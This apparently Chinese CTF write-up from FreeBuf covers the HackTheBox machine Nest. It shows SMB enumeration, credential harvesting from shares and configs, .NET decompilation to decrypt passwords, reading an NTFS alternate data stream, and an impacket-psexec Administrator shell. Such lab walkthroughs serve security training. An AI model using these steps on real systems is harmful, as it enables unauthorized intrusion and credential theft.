freeBuf
主站

分类

漏洞 工具 极客 Web安全 系统安全 网络安全 无线安全 设备/客户端安全 数据安全 安全管理 企业安全 工控安全

特色

头条 人物志 活动 视频 观点 招聘 报告 资讯 区块链安全 标准与合规 容器安全 公开课

官方公众号企业安全新浪微博

FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。

FreeBuf+小程序

FreeBuf+小程序

[Meachines] [Medium] Nest .NET 逆向工程+Notepad配置泄露+VB Projects分析+dnSpy动态调试+NTF...
2024-09-15 18:06:21

信息收集

IP AddressOpening Ports
10.10.10.178TCP:445,4386

$ nmap -p- 10.10.10.178 --min-rate 1000 -sC -sV

PORT     STATE SERVICE       VERSION
445/tcp  open  microsoft-ds?
4386/tcp open  unknown
| fingerprint-strings:
|   DNSStatusRequestTCP, DNSVersionBindReqTCP, Kerberos, LANDesk-RC, LDAPBindReq, LDAPSearchReq, LPDString, NULL, RPCCheck, SMBProgNeg, SSLSessionReq, TLSSessionReq, TerminalServer, TerminalServerCookie, X11Probe:
|     Reporting Service V1.2
|   FourOhFourRequest, GenericLines, GetRequest, HTTPOptions, RTSPRequest, SIPOptions:
|     Reporting Service V1.2
|     Unrecognised command
|   Help:
|     Reporting Service V1.2
|     This service allows users to run queries against databases using the legacy HQK format
|     AVAILABLE COMMANDS ---
|     LIST
|     SETDIR <Directory_Name>
|     RUNQUERY <Query_ID>
|     DEBUG <Password>
|_    HELP <Command>
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port4386-TCP:V=7.80%I=7%D=6/5%Time=5EDA78ED%P=x86_64-pc-linux-gnu%r(NUL
SF:L,21,"\r\nHQK\x20Reporting\x20Service\x20V1\.2\r\n\r\n>")%r(GenericLine
SF:s,3A,"\r\nHQK\x20Reporting\x20Service\x20V1\.2\r\n\r\n>\r\nUnrecognised
SF:\x20command\r\n>")%r(GetRequest,3A,"\r\nHQK\x20Reporting\x20Service\x20
SF:V1\.2\r\n\r\n>\r\nUnrecognised\x20command\r\n>")%r(HTTPOptions,3A,"\r\n
SF:HQK\x20Reporting\x20Service\x20V1\.2\r\n\r\n>\r\nUnrecognised\x20comman
SF:d\r\n>")%r(RTSPRequest,3A,"\r\nHQK\x20Reporting\x20Service\x20V1\.2\r\n
SF:\r\n>\r\nUnrecognised\x20command\r\n>")%r(RPCCheck,21,"\r\nHQK\x20Repor
SF:ting\x20Service\x20V1\.2\r\n\r\n>")%r(DNSVersionBindReqTCP,21,"\r\nHQK\
SF:x20Reporting\x20Service\x20V1\.2\r\n\r\n>")%r(DNSStatusRequestTCP,21,"\
SF:r\nHQK\x20Reporting\x20Service\x20V1\.2\r\n\r\n>")%r(Help,F2,"\r\nHQK\x
SF:20Reporting\x20Service\x20V1\.2\r\n\r\n>\r\nThis\x20service\x20allows\x
SF:20users\x20to\x20run\x20queries\x20against\x20databases\x20using\x20the
SF:\x20legacy\x20HQK\x20format\r\n\r\n---\x20AVAILABLE\x20COMMANDS\x20---\
SF:r\n\r\nLIST\r\nSETDIR\x20<Directory_Name>\r\nRUNQUERY\x20<Query_ID>\r\n
SF:DEBUG\x20<Password>\r\nHELP\x20<Command>\r\n>")%r(SSLSessionReq,21,"\r\
SF:nHQK\x20Reporting\x20Service\x20V1\.2\r\n\r\n>")%r(TerminalServerCookie
SF:,21,"\r\nHQK\x20Reporting\x20Service\x20V1\.2\r\n\r\n>")%r(TLSSessionRe
SF:q,21,"\r\nHQK\x20Reporting\x20Service\x20V1\.2\r\n\r\n>")%r(Kerberos,21
SF:,"\r\nHQK\x20Reporting\x20Service\x20V1\.2\r\n\r\n>")%r(SMBProgNeg,21,"
SF:\r\nHQK\x20Reporting\x20Service\x20V1\.2\r\n\r\n>")%r(X11Probe,21,"\r\n
SF:HQK\x20Reporting\x20Service\x20V1\.2\r\n\r\n>")%r(FourOhFourRequest,3A,
SF:"\r\nHQK\x20Reporting\x20Service\x20V1\.2\r\n\r\n>\r\nUnrecognised\x20c
SF:ommand\r\n>")%r(LPDString,21,"\r\nHQK\x20Reporting\x20Service\x20V1\.2\
SF:r\n\r\n>")%r(LDAPSearchReq,21,"\r\nHQK\x20Reporting\x20Service\x20V1\.2
SF:\r\n\r\n>")%r(LDAPBindReq,21,"\r\nHQK\x20Reporting\x20Service\x20V1\.2\
SF:r\n\r\n>")%r(SIPOptions,3A,"\r\nHQK\x20Reporting\x20Service\x20V1\.2\r\
SF:n\r\n>\r\nUnrecognised\x20command\r\n>")%r(LANDesk-RC,21,"\r\nHQK\x20Re
SF:porting\x20Service\x20V1\.2\r\n\r\n>")%r(TerminalServer,21,"\r\nHQK\x20
SF:Reporting\x20Service\x20V1\.2\r\n\r\n>");

SMB

$ smbmap -H 10.10.10.178 -u null

image.png

$ smbclient -N //10.10.10.178/data

smb: \> recurse ON
smb: \> prompt OFF
smb: \> mget *

image-1.png

$ cat Shared/Templates/HR/Welcome\ Email.txt

image-2.png

Username: TempUser
Password: welcome2019

$ smbmap -H 10.10.10.178 -u TempUser -p welcome2019

image-3.png

$ smbclient -U TempUser //10.10.10.178/data

smb: \> recurse ON
smb: \> prompt OFF
smb: \> mget *

image-4.png

$ cat IT/Configs/RU\ Scanner/RU_config.xml

image-6.png

base64被加密了

image-7.png

Notepad++ 配置泄露

image-8.png

$ smbclient -U TempUser //10.10.10.178/Secure$

smb: \> recurse ON
smb: \> prompt OFF
smb: \> cd IT\Carl
smb: \> mget *

image-10.png

$ tree VB\ Projects

image-11.png

$ cat VB\ Projects/WIP/RU/RUScanner/Module1.vb

image-12.png

这段代码的主要功能是从 XML 配置文件中加载配置信息,并使用这些信息初始化一个 SsoIntegration 对象。这通常用于在应用程序启动时读取配置并设置相关对象的属性。

将解决方案编译,这里我的主机环境无法编译Net4.0框架程序。

image-14.png

https://github.com/dnSpy/dnSpy/releases

dnSpy 是一个开源的 .NET 反编译器和调试器,专门用于反汇编、反编译和调试 .NET 程序。它允许用户查看和编辑 .NET 程序的源代码和程序集,以便进行分析、修复或修改。

使用dnSpy打开可执行文件

image-15.png

image-16.png

xRxRxPANCAK3SxRxRx

$ smbmap -H 10.10.10.178 -u C.Smith -p xRxRxPANCAK3SxRxRx

image-17.png

$ smbclient -U C.Smith //10.10.10.178/users

image-18.png

User.txt

16c744bbc301be8fe8816169e1f29b78

权限提升 (HQK & ADS)

ADS

$ smbclient -U C.Smith //10.10.10.178/users

smb: \> recurse ON
smb: \> prompt OFF
smb: \> cd C.Smith
smb: \C.Smith\> mget *

image-19.png

$ find HQK\ Reporting/ -type f -ls

image-20.png

image-21.png

我们需要进一步确认Debug Mode Password.txt

$ smbclient -U C.Smith //10.10.10.178/users
smb: \> allinfo "C.Smith/HQK Reporting/Debug Mode Password.txt"

image-22.png

smb: \> allinfo "C.Smith/HQK Reporting/Debug Mode Password.txt"
altname: DEBUGM~1.TXT
create_time:    Thu Aug  8 19:06:12 2019 EDT
access_time:    Thu Aug  8 19:06:12 2019 EDT
write_time:     Thu Aug  8 19:08:17 2019 EDT
change_time:    Wed Jul 21 14:47:12 2021 EDT
attributes: A (20)
stream: [::$DATA], 0 bytes
stream: [:Password:$DATA], 15 bytes

文件主数据流为空,但文件包含一个名为 Password 的额外数据流,其中包含了 15 字节的数据。

smb: \> cd "C.Smith\HQK Reporting"
smb: \C.Smith\HQK Reporting\> get "Debug Mode Password.txt:Password"

image-23.png

image-24.png

WBQ201953D8w

HQK

$ rlwrap telnet 10.10.10.178 4386
>debug WBQ201953D8w
>SETDIR ..
>LIST
image-25.png

>SETDIR LDAP
>showquery 2

image-26.png

image-27.png

using System;
using System.Collections.Generic;
using System.Diagnostics;
using System.IO;
using HqkLdap.My;
using Microsoft.VisualBasic.CompilerServices;

namespace HqkLdap
{
	// Token: 0x0200000A RID: 10
	[StandardModule]
	internal sealed class MainModule
	{
		// Token: 0x06000027 RID: 39 RVA: 0x000026BC File Offset: 0x00000ABC
		[STAThread]
		public static void Main()
		{
			checked
			{
				try
				{
					if (MyProject.Application.CommandLineArgs.Count != 1)
					{
						Console.WriteLine("Invalid number of command line arguments");
					}
					else if (!File.Exists(MyProject.Application.CommandLineArgs[0]))
					{
						Console.WriteLine("Specified config file does not exist");
					}
					else if (!File.Exists("HqkDbImport.exe"))
					{
						Console.WriteLine("Please ensure the optional database import module is installed");
					}
					else
					{
						LdapSearchSettings ldapSearchSettings = new LdapSearchSettings();
						string[] array = File.ReadAllLines(MyProject.Application.CommandLineArgs[0]);
						foreach (string text in array)
						{
							if (text.StartsWith("Domain=", StringComparison.CurrentCultureIgnoreCase))
							{
								ldapSearchSettings.Domain = text.Substring(text.IndexOf('=') + 1);
							}
							else if (text.StartsWith("User=", StringComparison.CurrentCultureIgnoreCase))
							{
								ldapSearchSettings.Username = text.Substring(text.IndexOf('=') + 1);
							}
							else if (text.StartsWith("Password=", StringComparison.CurrentCultureIgnoreCase))
							{
								ldapSearchSettings.Password = CR.DS(text.Substring(text.IndexOf('=') + 1));
							}
						}
						Ldap ldap = new Ldap();
						ldap.Username = ldapSearchSettings.Username;
						ldap.Password = ldapSearchSettings.Password;
						ldap.Domain = ldapSearchSettings.Domain;
						Console.WriteLine("Performing LDAP query...");
						List<string> list = ldap.FindUsers();
						Console.WriteLine(Conversions.ToString(list.Count) + " user accounts found. Importing to database...");
						try
						{
							foreach (string text2 in list)
							{
								Console.WriteLine(text2);
								Process.Start("HqkDbImport.exe /ImportLdapUser " + text2);
							}
						}
						finally
						{
							List<string>.Enumerator enumerator;
							((IDisposable)enumerator).Dispose();
						}
					}
				}
				catch (Exception ex)
				{
					Console.WriteLine("Unexpected error: " + ex.Message);
				}
			}
		}
	}
}

这个程序的主要功能是从配置文件读取 LDAP 查询设置,执行 LDAP 查询以找到用户账户,然后将这些账户通过外部程序 HqkDbImport.exe 导入到数据库中。

配置文件:

Domain=nest.local
Port=389
BaseOu=OU=WBQ Users,OU=Production,DC=nest,DC=local
User=Administrator
Password=yyEq0Uvvhq2uQOcWG8peLoeRQehqip/fKdeG/kjEVb4=

image-28.png

if (MyProject.Application.CommandLineArgs.Count != 1) 
      {
        Console.WriteLine("Invalid number of command line arguments");
      }
      else if (!File.Exists(MyProject.Application.CommandLineArgs[0]))
      {
        Console.WriteLine("Specified config file does not exist");
      }
      else if (!File.Exists("HqkDbImport.exe"))
      {
        Console.WriteLine("Please ensure the optional database import module is installed");
      }

执行条件:

1.有一个命令行参数。

2.指定为命令行参数的配置文件存在。(从HQK中获取)

3.HqkDbImport.exe存在

实际上这个HqkDbImport.exe直接创建一个1.txt修改名称就可以绕过第三条语句

image-29.png

Password: XtH4nkS4Pl4y1nGX

$ impacket-psexec administrator:XtH4nkS4Pl4y1nGX@10.10.10.178

image-30.png

Root.txt

85d4497ec0807330257a23e9f866a599

# 网络安全 # web安全 # CTF
本文为 独立观点,未经允许不得转载,授权请联系FreeBuf客服小蜜蜂,微信:freebee2022
被以下专辑收录,发现更多精彩内容
+ 收入我的专辑
+ 加入我的收藏
相关推荐
  • 0 文章数
  • 0 关注者
文章目录